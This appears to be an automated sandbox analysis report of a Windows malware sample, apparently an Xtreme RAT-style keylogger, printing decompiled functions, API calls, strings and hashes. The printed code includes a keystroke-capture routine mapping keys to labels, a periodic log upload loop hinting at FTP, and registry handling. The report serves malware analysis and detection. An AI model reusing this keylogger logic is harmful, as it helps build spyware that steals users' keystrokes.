SetFileAttributesW.KERNEL32(00000000,00000080,shell32.dll,URLMON.DLL,00000000,1000A98B,?,?,?,?,00000000,00000000), ref: 1000A5E7
DeleteFileW.KERNEL32(00000000,00000002,00000000,00000000,00000080,shell32.dll,URLMON.DLL,00000000,1000A98B,?,?,?,?,00000000,00000000), ref: 1000A6BA

Strings

URLMON.DLL, xrefs: 1000A5A3
shell32.dll, xrefs: 1000A5AD
ENDSERVERBUFFER, xrefs: 1000A65B
XTREME, xrefs: 1000A5BA
STARTSERVERBUFFER, xrefs: 1000A64A

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileLibraryLoad$AttributesDelete
String ID: ENDSERVERBUFFER$STARTSERVERBUFFER$URLMON.DLL$XTREME$shell32.dll
API String ID: 1064610246-2417524110
Opcode ID: 5f286e1d0fd3c37f5beda26e71c0865df4d0ed5b9a9d771c72d972da7527a27b
Instruction ID: 30b3ef76a2a80ae0936852672a2bbee531ad642fb2a80bd77bca9c30e5cd02f7
Opcode Fuzzy Hash: 5f286e1d0fd3c37f5beda26e71c0865df4d0ed5b9a9d771c72d972da7527a27b
Instruction Fuzzy Hash: 7F418D78A141199BEB11DBA4CC82BEFB3B9FF44380F508165F504A728ADB34BE418B64

Uniqueness

Uniqueness Score: -1.00%

Function 10009204, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E10009204() {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t38;
				void* _t39;
				void* _t53;
				intOrPtr _t57;
				void* _t58;
				intOrPtr _t59;
				intOrPtr _t63;
				void* _t65;
				intOrPtr _t73;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0x1000937d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t73;
				while(1) {
					_t53 = 0;
					goto L2;
					L2:
					Sleep(0x3e8);
					_t53 = _t53 + 1;
					if(_t53 < ( *0x1000f6bc + 1 + ( *0x1000f6bc + 1) * 4) * 0x3c) {
						goto L2;
					} else {
						_t77 =  *0x1000e0b8;
						if( *0x1000e0b8 != 0) {
							E10006B14(0x2e, _t53, 0x2e, 0x2d, 0x1000e0b8, 0x1000f6bc,  &_v8);
							E10003928( &_v8, 0x2e, L".html", _t77);
							_push(E1000390C(_v8));
							_t26 =  *0x1000f6ac; // 0x0
							_push(E1000390C(_t26));
							_t28 =  *0x1000f6b0; // 0x0
							_push(E1000390C(_t28));
							_t63 =  *0x1000f684; // 0x0
							E10003988( &_v12, 0x100093a0, _t63, _t77);
							_push(E1000390C(_v12));
							_t57 =  *0x1000f6a8; // 0x0
							E10003988( &_v16, _t57, 0x100093ac, _t77);
							_push(E1000390C(_v16));
							_t38 =  *0x1000f6a4; // 0x0
							_t39 = E1000390C(_t38);
							_pop(_t65);
							_pop(_t58);
							if(E10008DA4(_t39, _t53, _t58, _t65, 0x1000e0b8, 0x1000f6bc) != 0 &&  *0x1000f6c0 == 1) {
								_t80 =  *0x1000f6c1 - 1;
								if( *0x1000f6c1 == 1) {
									SetFilePointer( *0x1000e0b8, 0, 0, "jjj");
									SetEndOfFile( *0x1000e0b8);
									 *0x1000f6c4 = 0;
									 *0x1000f6c8 = 0;
									E10006710( &_v20, _t58, _t65,  *0x1000f6c4,  *0x1000f6c8);
									_t59 =  *0x1000f6b4; // 0x0
									E10003988( &_v24, _t59, L"SOFTWARE\\", _t80);
									E1000577C(0x80000001, _t53, L"LastSize", _v24, 0x1000f6bc, _t80, 2, _v20);
								}
							}
						}
						continue;
					}
				}
			}

0x10009209
0x1000920a
0x1000920b
0x1000920c
0x1000920d
0x1000921e
0x10009223
0x10009226
0x10009229
0x10009229
0x10009229
0x1000922b
0x10009230
0x10009235
0x10009241
0x00000000
0x10009243
0x10009243
0x10009246
0x10009258
0x10009265
0x10009272
0x10009273
0x1000927d
0x1000927e
0x10009288
0x10009291
0x10009297
0x100092a4
0x100092a8
0x100092b3
0x100092c0
0x100092c1
0x100092c6
0x100092cb
0x100092cc
0x100092d4
0x100092e7
0x100092ee
0x100092fd
0x10009305
0x1000930a
0x10009314
0x1000932d
0x1000933b
0x10009346
0x10009358
0x10009358
0x100092ee
0x100092d4
0x00000000
0x10009246
0x10009241

APIs

Sleep.KERNEL32(000003E8,00000000,1000937D,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 10009230
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000003E8,00000000,1000937D,?,?,?,?,00000000), ref: 100092FD
SetEndOfFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000003E8,00000000,1000937D), ref: 10009305

Strings

.html, xrefs: 10009260
FTP, xrefs: 1000928C
LastSize, xrefs: 1000934E
SOFTWARE\, xrefs: 10009341
jjj, xrefs: 100092F4

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$PointerSleep
String ID: .html$FTP$LastSize$SOFTWARE\$jjj
API String ID: 1384090385-2221063783
Opcode ID: f64d9703497d1778a1f724dcd6172282dd11fce0a9d43a36a9a9269ada9e7162
Instruction ID: 1ef3a85e4ac3c80801a06b688fa0acd6d065186ae52865efd5065228073e7574
Opcode Fuzzy Hash: f64d9703497d1778a1f724dcd6172282dd11fce0a9d43a36a9a9269ada9e7162
Instruction Fuzzy Hash: 9F317078500145BFF705DB64CD81BAF77ADEB453C0F904129F440AB6BACBB2AD509B61

Uniqueness

Uniqueness Score: -1.00%

Function 10005A94, Relevance: 12.6, Strings: 10, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E10005A94(char __eax, void* __ebx, void* __ecx) {
				char _v8;
				intOrPtr _t52;
				intOrPtr _t64;

				_v8 = __eax;
				E10003C28( &_v8);
				_push(_t64);
				_push(0x10005b87);
				_push( *[fs:eax]);
				 *[fs:eax] = _t64;
				E10003A34(_v8, L"HKEY_CLASSES_ROOT");
				if(0 != 0) {
					E10003A34(_v8, L"HKCR");
					if(0 != 0) {
						E10003A34(_v8, L"HKEY_CURRENT_USER");
						if(__eflags == 0) {
							L5:
						} else {
							E10003A34(_v8, L"HKCU");
							if(__eflags != 0) {
								E10003A34(_v8, L"HKEY_LOCAL_MACHINE");
								if(__eflags == 0) {
									L8:
								} else {
									E10003A34(_v8, L"HKLM");
									if(__eflags != 0) {
										E10003A34(_v8, L"HKEY_USERS");
										if(__eflags == 0) {
											L11:
										} else {
											E10003A34(_v8, 0x10005c60);
											if(__eflags != 0) {
												E10003A34(_v8, L"HKEY_CURRENT_CONFIG");
												if(__eflags == 0) {
													L14:
												} else {
													E10003A34(_v8, L"HKCC");
													if(__eflags == 0) {
														goto L14;
													}
												}
											} else {
												goto L11;
											}
										}
									} else {
										goto L8;
									}
								}
							} else {
								goto L5;
							}
						}
					} else {
						goto L2;
					}
				}
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(E10005B8E);
				return E10003770( &_v8);
			}

0x10005a99
0x10005a9f
0x10005aa6
0x10005aa7
0x10005aac
0x10005aaf
0x10005abf
0x10005ac4
0x10005ace
0x10005ad3
0x10005ae7
0x10005aec
0x10005afd
0x10005aee
0x10005af6
0x10005afb
0x10005b0c
0x10005b11
0x10005b22
0x10005b13
0x10005b1b
0x10005b20
0x10005b31
0x10005b36
0x10005b47
0x10005b38
0x10005b40
0x10005b45
0x10005b56
0x10005b5b
0x10005b6c
0x10005b5d
0x10005b65
0x10005b6a
0x00000000
0x00000000
0x10005b6a
0x00000000
0x00000000
0x00000000
0x10005b45
0x00000000
0x00000000
0x00000000
0x10005b20
0x00000000
0x00000000
0x00000000
0x10005afb
0x00000000
0x00000000
0x00000000
0x10005ad3
0x10005b73
0x10005b76
0x10005b79
0x10005b86

Strings

HKU, xrefs: 10005B3B
HKEY_CURRENT_USER, xrefs: 10005AE2
HKEY_CLASSES_ROOT, xrefs: 10005ABA
HKCC, xrefs: 10005B60
HKEY_LOCAL_MACHINE, xrefs: 10005B07
HKLM, xrefs: 10005B16
HKEY_CURRENT_CONFIG, xrefs: 10005B51
HKEY_USERS, xrefs: 10005B2C
HKCR, xrefs: 10005AC9
HKCU, xrefs: 10005AF1

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocString
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 2525500382-909552448
Opcode ID: 19a7d89fdd0d4a8943666261cc10e3fb7835feb1d7da3395f8e32f4d42fefbdb
Instruction ID: 07abd4759daa604870a4f77bd8534178fed91fd4fee8f89ff290bb29f67fd9b2
Opcode Fuzzy Hash: 19a7d89fdd0d4a8943666261cc10e3fb7835feb1d7da3395f8e32f4d42fefbdb
Instruction Fuzzy Hash: E5211D38B041C99BF711DA99858295FB3E9DB8D7C2FB08091B8415731EDB37BF019622

Uniqueness

Uniqueness Score: -1.00%

Function 10006E78, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E10006E78(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed int _a12, void* _a16, struct HKL__* _a20) {
				char _v5;
				void _v261;
				char _v520;
				int _v524;
				void _v528;
				short _v784;
				char _v1040;
				char _v1044;
				char _v1048;
				void* _t43;
				int _t68;
				int _t72;
				intOrPtr _t108;
				struct HKL__* _t129;
				struct HKL__* _t133;
				struct HKL__* _t137;
				int _t140;
				int _t142;
				void* _t147;
				int _t160;

				_v1048 = 0;
				_v1044 = 0;
				memcpy( &_v261, _a16, 0x40 << 2);
				_t96 = _a4;
				_t129 = _a20;
				_push(_t147);
				_push(0x100078b7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147 + 0xfffffffffffffbf8;
				E10003770(_a4);
				_t43 = (_a8 & 0x0000ffff) + 0xfffffff8;
				if(_t43 <= 0xf3) {
					switch( *((intOrPtr*)( *(_t43 + 0x10006edc) * 4 +  &M10006FD0))) {
						case 0:
							goto L91;
						case 1:
							E100037AC(_t96, L"[Numpad +]");
							goto L91;
						case 2:
							__eax = __ebx;
							__edx = L"[Backspace]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 3:
							__eax = __ebx;
							__edx = L"[Numpad .]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 4:
							__eax = __ebx;
							__edx = L"[Numpad /]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 5:
							__eax = __ebx;
							__edx = L"[Esc]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 6:
							__eax = __ebx;
							__edx = L"[Execute]";
							__eax = E100037AC(__ebx, __edx);
							_push(__edx);
							__eax = __eax + 0xc38b0000;
							__eflags = __eax;
							goto L91;
						case 7:
							__eax = __ebx;
							__edx = L"[Numpad *]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 8:
							__eax = __ebx;
							__edx = 0x10007980;
							__eax = E100037AC(__ebx, 0x10007980);
							goto L91;
						case 9:
							__eax = __ebx;
							__edx = 0x10007988;
							__eax = E100037AC(__ebx, 0x10007988);
							goto L91;
						case 0xa:
							__eax = __ebx;
							__edx = 0x10007990;
							__eax = E100037AC(__ebx, 0x10007990);
							goto L91;
						case 0xb:
							__eax = __ebx;
							__edx = 0x10007998;
							__eax = E100037AC(__ebx, 0x10007998);
							goto L91;
						case 0xc:
							__eax = __ebx;
							__edx = 0x100079a0;
							__eax = E100037AC(__ebx, 0x100079a0);
							goto L91;
						case 0xd:
							__eax = __ebx;
							__edx = 0x100079a8;
							__eax = E100037AC(__ebx, 0x100079a8);
							goto L91;
						case 0xe:
							__eax = __ebx;
							__edx = 0x100079b0;
							__eax = E100037AC(__ebx, 0x100079b0);
							goto L91;
						case 0xf:
							__eax = __ebx;
							__edx = 0x100079b8;
							__eax = E100037AC(__ebx, 0x100079b8);
							goto L91;
						case 0x10:
							__eax = __ebx;
							__edx = 0x100079c0;
							__eax = E100037AC(__ebx, 0x100079c0);
							goto L91;
						case 0x11:
							__eax = __ebx;
							__edx = 0x100079c8;
							__eax = E100037AC(__ebx, 0x100079c8);
							goto L91;
						case 0x12:
							__eax = __ebx;
							__edx = L"[Back Tab]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x13:
							__eax = __ebx;
							__edx = L"[Copy]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x14:
							__eax = __ebx;
							__edx = L"[Finish]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x15:
							__eax = __ebx;
							__edx = L"[Reset]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x16:
							__eax = __ebx;
							__edx = L"[Play]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x17:
							__eax = __ebx;
							__edx = L"[Process]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x18:
							__eax = __ebx;
							__edx = 0x10007a58;
							__eax = E100037AC(__ebx, 0x10007a58);
							goto L91;
						case 0x19:
							__eax = __ebx;
							__edx = L"[Select]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x1a:
							__eax = __ebx;
							__edx = L"[Separator]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x1b:
							__eax = __ebx;
							__edx = 0x10007a98;
							__eax = E100037AC(__ebx, 0x10007a98);
							goto L91;
						case 0x1c:
							__eax = __ebx;
							__edx = L"[Numpad -]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x1d:
							__eax = __ebx;
							__edx = L"[Tab]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x1e:
							__eax = __ebx;
							__edx = L"[Zoom]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x1f:
							__eax = __ebx;
							__edx = L"[Accept]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x20:
							__eax = __ebx;
							__edx = L"[Context Menu]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x21:
							__eax = __ebx;
							__edx = L"[Caps Lock]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x22:
							__eax = __ebx;
							__edx = L"[Delete]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x23:
							__eax = __ebx;
							__edx = L"[Arrow Down]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x24:
							__eax = __ebx;
							__edx = L"[End]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x25:
							__eax = __ebx;
							__edx = L"[F1]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x26:
							__eax = __ebx;
							__edx = L"[F10]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x27:
							__eax = __ebx;
							__edx = L"[F11]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x28:
							__eax = __ebx;
							__edx = L"[F12]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x29:
							__eax = __ebx;
							__edx = L"[F13]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x2a:
							__eax = __ebx;
							__edx = L"[F14]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x2b:
							__eax = __ebx;
							__edx = L"[F15]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x2c:
							__eax = __ebx;
							__edx = L"[F16]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x2d:
							__eax = __ebx;
							__edx = L"[F17]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x2e:
							__eax = __ebx;
							__edx = L"[F18]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x2f:
							__eax = __ebx;
							__edx = L"[F19]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x30:
							__eax = __ebx;
							__edx = L"[F2]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x31:
							__eax = __ebx;
							__edx = L"[F20]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x32:
							__eax = __ebx;
							__edx = L"[F21]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x33:
							__eax = __ebx;
							__edx = L"[F22]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x34:
							__eax = __ebx;
							__edx = L"[F23]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x35:
							__eax = __ebx;
							__edx = L"[F24]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x36:
							__eax = __ebx;
							__edx = L"[F3]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x37:
							__eax = __ebx;
							__edx = L"[F4]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x38:
							__eax = __ebx;
							__edx = L"[F5]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x39:
							__eax = __ebx;
							__edx = L"[F6]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x3a:
							__eax = __ebx;
							__edx = L"[F7]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x3b:
							__eax = __ebx;
							__edx = L"[F8]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x3c:
							__eax = __ebx;
							__edx = L"[F9]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x3d:
							__eax = __ebx;
							__edx = L"[Help]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x3e:
							__eax = __ebx;
							__edx = L"[Home]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x3f:
							__eax = __ebx;
							__edx = L"[Insert]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x40:
							__eax = __ebx;
							__edx = L"[Mail]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x41:
							__eax = __ebx;
							__edx = L"[Media]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x42:
							__eax = __ebx;
							__edx = L"[Left Ctrl]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x43:
							__eax = __ebx;
							__edx = L"[Arrow Left]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x44:
							__eax = __ebx;
							__edx = L"[Left Alt]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x45:
							__eax = __ebx;
							__edx = L"[Next Track]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x46:
							__eax = __ebx;
							__edx = L"[Play / Pause]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x47:
							__eax = __ebx;
							__edx = L"[Previous Track]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x48:
							__eax = __ebx;
							__edx = L"[Stop]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x49:
							__eax = __ebx;
							__edx = L"[Mode Change]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x4a:
							__eax = __ebx;
							__edx = L"[Page Down]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x4b:
							__eax = __ebx;
							__edx = L"[Num Lock]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x4c:
							__eax = __ebx;
							__edx = L"[Pause]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x4d:
							__eax = __ebx;
							__edx = L"[Print]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x4e:
							__eax = __ebx;
							__edx = L"[Page Up]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x4f:
							__eax = __ebx;
							__edx = L"[Right Ctrl]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x50:
							__eax = __ebx;
							__edx = L"[Arrow Right]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x51:
							__eax = __ebx;
							__edx = L"[Right Alt]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x52:
							__eax = __ebx;
							__edx = L"[Scrol Lock]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x53:
							__eax = __ebx;
							__edx = L"[Sleep]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x54:
							__eax = __ebx;
							__edx = L"[Print Screen]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x55:
							__eax = __ebx;
							__edx = L"[Arrow Up]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x56:
							__eax = __ebx;
							__edx = L"[Volume Down]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x57:
							__eax = __ebx;
							__edx = L"[Volume Mute]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
						case 0x58:
							__eax = __ebx;
							__edx = L"[Volume Up]";
							__eax = E100037AC(__ebx, __edx);
							goto L91;
					}
				}
				L91:
				E10003A34( *_t96, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *_t96) > 0 && E10003B94(L"Numpad",  *_t96) <= 0) {
					E100037AC(_t96, L"KeyDelBackspace");
				}
				_v5 = E10006D04();
				_t140 = ToUnicodeEx(_a8 & 0x0000ffff, _a12 & 0x0000ffff,  &_v261,  &_v784, 0x100, 0, _t129);
				if(_t140 <= 0) {
					__eflags = _t140;
					if(_t140 < 0) {
						 *0x1000f6d8 = _a8 & 0x0000ffff;
						 *0x1000f6dc = _a12 & 0x0000ffff;
						memcpy(0x1000f6e0,  &_v261, 0x40 << 2);
						_t133 = _t129;
						_t142 = _t140;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t142;
						if(_t142 < 0) {
							do {
								_t68 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1),  &_v1040,  &_v784, 0x100, 0, _t133);
								__eflags = _t68;
							} while (_t68 < 0);
						}
					}
				} else {
					memcpy( &_v528, 0x1000f6d8, 0x42 << 2);
					_t137 = _t129;
					E10003A34( *_t96, 0);
					if(0 == 0) {
						E100038E0(_t96, 0x80,  &_v784);
						_t159 = _v5;
						if(_v5 == 0) {
							E10006D80( *_t96, _t96, 0x80,  &_v1048, _t137, 0x1000f6d8, __eflags);
							E100037AC(_t96, _v1048);
						} else {
							E10006DFC( *_t96, _t96, 0x80,  &_v1044, _t137, 0x1000f6d8, _t159);
							E100037AC(_t96, _v1044);
						}
					}
					_t72 = _v528;
					_t160 = _t72;
					if(_t160 != 0) {
						ToUnicodeEx(_t72, _v524,  &_v520,  &_v784, 0x100, 0, _t137);
					}
					E100050D8();
				}
				E10003A34( *_t96, L"KeyDelBackspace");
				if(_t160 == 0) {
					E10003770(_t96);
				}
				_pop(_t108);
				 *[fs:eax] = _t108;
				_push(E100078BE);
				return E10003788( &_v1048, 2);
			}

0x10006e86
0x10006e8c
0x10006ea0
0x10006ea2
0x10006ea5
0x10006eaa
0x10006eab
0x10006eb0
0x10006eb3
0x10006eb8
0x10006ec1
0x10006ec9
0x10006ed5
0x00000000
0x00000000
0x00000000
0x1000713b
0x00000000
0x00000000
0x10007145
0x10007147
0x1000714c
0x00000000
0x00000000
0x10007156
0x10007158
0x1000715d
0x00000000
0x00000000
0x10007167
0x10007169
0x1000716e
0x00000000
0x00000000
0x10007178
0x1000717a
0x1000717f
0x00000000
0x00000000
0x10007189
0x1000718b
0x10007190
0x10007196
0x10007197
0x10007197
0x00000000
0x00000000
0x1000719a
0x1000719c
0x100071a1
0x00000000
0x00000000
0x100071ab
0x100071ad
0x100071b2
0x00000000
0x00000000
0x100071bc
0x100071be
0x100071c3
0x00000000
0x00000000
0x100071cd
0x100071cf
0x100071d4
0x00000000
0x00000000
0x100071de
0x100071e0
0x100071e5
0x00000000
0x00000000
0x100071ef
0x100071f1
0x100071f6
0x00000000
0x00000000
0x10007200
0x10007202
0x10007207
0x00000000
0x00000000
0x10007211
0x10007213
0x10007218
0x00000000
0x00000000
0x10007222
0x10007224
0x10007229
0x00000000
0x00000000
0x10007233
0x10007235
0x1000723a
0x00000000
0x00000000
0x10007244
0x10007246
0x1000724b
0x00000000
0x00000000
0x10007255
0x10007257
0x1000725c
0x00000000
0x00000000
0x10007266
0x10007268
0x1000726d
0x00000000
0x00000000
0x10007277
0x10007279
0x1000727e
0x00000000
0x00000000
0x10007288
0x1000728a
0x1000728f
0x00000000
0x00000000
0x10007299
0x1000729b
0x100072a0
0x00000000
0x00000000
0x100072aa
0x100072ac
0x100072b1
0x00000000
0x00000000
0x100072bb
0x100072bd
0x100072c2
0x00000000
0x00000000
0x100072cc
0x100072ce
0x100072d3
0x00000000
0x00000000
0x100072dd
0x100072df
0x100072e4
0x00000000
0x00000000
0x100072ee
0x100072f0
0x100072f5
0x00000000
0x00000000
0x100072ff
0x10007301
0x10007306
0x00000000
0x00000000
0x10007310
0x10007312
0x10007317
0x00000000
0x00000000
0x10007321
0x10007323
0x10007328
0x00000000
0x00000000
0x10007332
0x10007334
0x10007339
0x00000000
0x00000000
0x10007343
0x10007345
0x1000734a
0x00000000
0x00000000
0x10007354
0x10007356
0x1000735b
0x00000000
0x00000000
0x10007365
0x10007367
0x1000736c
0x00000000
0x00000000
0x10007376
0x10007378
0x1000737d
0x00000000
0x00000000
0x10007387
0x10007389
0x1000738e
0x00000000
0x00000000
0x10007398
0x1000739a
0x1000739f
0x00000000
0x00000000
0x100073a9
0x100073ab
0x100073b0
0x00000000
0x00000000
0x100073ba
0x100073bc
0x100073c1
0x00000000
0x00000000
0x100073cb
0x100073cd
0x100073d2
0x00000000
0x00000000
0x100073dc
0x100073de
0x100073e3
0x00000000
0x00000000
0x100073ed
0x100073ef
0x100073f4
0x00000000
0x00000000
0x100073fe
0x10007400
0x10007405
0x00000000
0x00000000
0x1000740f
0x10007411
0x10007416
0x00000000
0x00000000
0x10007420
0x10007422
0x10007427
0x00000000
0x00000000
0x10007431
0x10007433
0x10007438
0x00000000
0x00000000
0x10007442
0x10007444
0x10007449
0x00000000
0x00000000
0x10007453
0x10007455
0x1000745a
0x00000000
0x00000000
0x10007464
0x10007466
0x1000746b
0x00000000
0x00000000
0x10007475
0x10007477
0x1000747c
0x00000000
0x00000000
0x10007486
0x10007488
0x1000748d
0x00000000
0x00000000
0x10007497
0x10007499
0x1000749e
0x00000000
0x00000000
0x100074a8
0x100074aa
0x100074af
0x00000000
0x00000000
0x100074b9
0x100074bb
0x100074c0
0x00000000
0x00000000
0x100074ca
0x100074cc
0x100074d1
0x00000000
0x00000000
0x100074db
0x100074dd
0x100074e2
0x00000000
0x00000000
0x100074ec
0x100074ee
0x100074f3
0x00000000
0x00000000
0x100074fd
0x100074ff
0x10007504
0x00000000
0x00000000
0x1000750e
0x10007510
0x10007515
0x00000000
0x00000000
0x1000751f
0x10007521
0x10007526
0x00000000
0x00000000
0x10007530
0x10007532
0x10007537
0x00000000
0x00000000
0x10007541
0x10007543
0x10007548
0x00000000
0x00000000
0x10007552
0x10007554
0x10007559
0x00000000
0x00000000
0x10007563
0x10007565
0x1000756a
0x00000000
0x00000000
0x10007574
0x10007576
0x1000757b
0x00000000
0x00000000
0x10007585
0x10007587
0x1000758c
0x00000000
0x00000000
0x10007596
0x10007598
0x1000759d
0x00000000
0x00000000
0x100075a7
0x100075a9
0x100075ae
0x00000000
0x00000000
0x100075b8
0x100075ba
0x100075bf
0x00000000
0x00000000
0x100075c9
0x100075cb
0x100075d0
0x00000000
0x00000000
0x100075da
0x100075dc
0x100075e1
0x00000000
0x00000000
0x100075eb
0x100075ed
0x100075f2
0x00000000
0x00000000
0x100075fc
0x100075fe
0x10007603
0x00000000
0x00000000
0x1000760d
0x1000760f
0x10007614
0x00000000
0x00000000
0x1000761e
0x10007620
0x10007625
0x00000000
0x00000000
0x1000762f
0x10007631
0x10007636
0x00000000
0x00000000
0x10007640
0x10007642
0x10007647
0x00000000
0x00000000
0x10007651
0x10007653
0x10007658
0x00000000
